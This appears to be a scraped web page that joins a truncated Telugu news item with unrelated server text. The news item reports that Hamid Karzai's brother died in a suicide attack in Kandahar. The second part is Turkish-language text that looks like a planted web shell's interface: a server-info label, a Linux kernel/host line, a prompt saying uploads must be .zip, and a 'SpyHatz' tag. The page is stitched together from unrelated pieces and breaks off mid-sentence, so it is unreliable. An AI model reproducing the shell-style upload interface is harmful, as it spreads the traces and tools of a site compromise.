జాతీయంకాందహార్‌లో అత్మాహుతి దాడి: అధ్యక్షుని సోదరుడు మృతి

కాందహార్(ఏజెన్సీస్): ఆప్ఘనిస్తాన్‌లో జరిగిన ఆత్మాహుతి దాడిలో ఆప్ఘనిస్తాన్ అధక్షుడు హమీద్ కర్జాయ్ సోదరుడు...

International
Africa
Brazil
China
Finland
 
Sw Bilgi

Linux ip-10-0-0-100 3.13.0-44-generic #73-Ubuntu SMP Tue Dec 16 00:22:43 UTC 2014 x86_64
Yükleyece?iniz Dosya .zip Olaml?d?r.
// SpyHatz